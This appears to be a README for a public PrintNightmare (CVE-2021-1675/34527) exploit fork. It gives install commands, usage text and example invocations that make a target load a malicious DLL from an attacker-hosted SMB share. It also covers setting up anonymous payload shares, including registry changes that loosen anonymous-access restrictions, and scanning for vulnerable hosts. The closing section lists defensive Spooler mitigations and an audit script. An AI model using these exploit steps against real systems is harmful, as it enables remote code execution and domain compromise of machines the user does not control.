# CVE-2021-1675
C# and Impacket implementation (here with Kerberos auth support) of PrintNightmare CVE-2021-1675/CVE-2021-34527
## CVE-2021-1675 / CVE-2021-34527

- Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
- Tested on a fully patched 2019 Domain Controller
- Added Kerberos authentication support in this fork
- Execute malicious DLLs remotely or locally
## Installation

Before running the exploit you need to install this fork of Impacket; after that you're all set.

```bash
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
```
## CVE-2021-1675.py

```
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] target share [pDriverPath]

PrintNightmare CVE-2021-1675 / CVE-2021-34527 implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'
  pDriverPath           Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'

optional arguments:
  -h, --help            show this help message and exit

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server
```
Example (the password and target in the first two lines were lost in extraction and are shown as placeholders):

```bash
./CVE-2021-1675.py hackit.local/domain_user:<password>@<target-ip> '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:<password>@<target-ip> '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
./CVE-2021-1675.py -k -no-pass -dc-ip 192.168.1.1 -target-ip 192.168.1.10 vulnserver.corp.local '\\192.168.1.215\smb\addCube.dll'
```
## SMB configuration

The easiest way to host payloads is to use Samba and modify /etc/samba/smb.conf to allow anonymous access:

```ini
[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser
```

Another option that avoids editing the configuration manually is `net usershare` (see the related Samba documentation pages).

From Windows it's also possible:

```powershell
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f # This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot
```
## Scanning

We can use rpcdump.py from Impacket to scan for potentially vulnerable hosts; if it returns a value, the host could be vulnerable:

```bash
rpcdump.py @192.168.1.10 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol
```
## Mitigation

Disable the Spooler service:

```powershell
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
```

Or uninstall Print-Services:

```powershell
Uninstall-WindowsFeature Print-Services
```
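The two mitigations above are per-host commands. As an added example (not part of this repository), the script below audits the Print Spooler across a list of hosts and only applies the "disable Spooler" mitigation when asked to, so real print servers are not silently broken. It assumes PowerShell 5.1 or later, WinRM remoting enabled on the targets and local administrator rights there; the host names are placeholders.

```powershell
# Added example, not from the original repository: report (and optionally
# disable) the Print Spooler service on a set of hosts. Assumes PowerShell 5.1+,
# WinRM remoting to the targets and local admin rights. Host names are placeholders.
param(
    [string[]]$ComputerName = @('DC01.corp.local', 'FS01.corp.local'),  # placeholders
    [switch]$Disable  # report only unless this switch is given
)

$doDisable = [bool]$Disable   # plain bool survives serialisation to the remote side

$results = Invoke-Command -ComputerName $ComputerName -ErrorAction Continue -ScriptBlock {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if (-not $svc) {
        # Print-Services removed (or never installed): nothing to disable
        return [pscustomobject]@{ Host = $env:COMPUTERNAME; Status = 'NotInstalled'; StartType = 'N/A'; Action = 'None' }
    }
    $action = 'None'
    if ($using:doDisable -and ($svc.Status -eq 'Running' -or $svc.StartType -ne 'Disabled')) {
        # Same effect as "Stop-Service Spooler" plus Start=4 in the registry
        Stop-Service -Name Spooler -Force -ErrorAction SilentlyContinue
        Set-Service -Name Spooler -StartupType Disabled
        $action = 'Disabled'
        $svc = Get-Service -Name Spooler   # re-read so the report shows the new state
    }
    [pscustomobject]@{
        Host      = $env:COMPUTERNAME
        Status    = $svc.Status
        StartType = $svc.StartType
        Action    = $action
    }
}

$results | Sort-Object Host | Format-Table Host, Status, StartType, Action -AutoSize

# Hosts still running the Spooler are the ones rpcdump.py (Scanning section) will list with MS-RPRN
$stillRunning = @($results | Where-Object { $_.Status -eq 'Running' })
Write-Host ("{0} of {1} reachable hosts still run the Print Spooler." -f $stillRunning.Count, @($results).Count)
```

Run it without `-Disable` first to see which hosts are print servers that legitimately need the service; unreachable hosts are reported as errors and skipped.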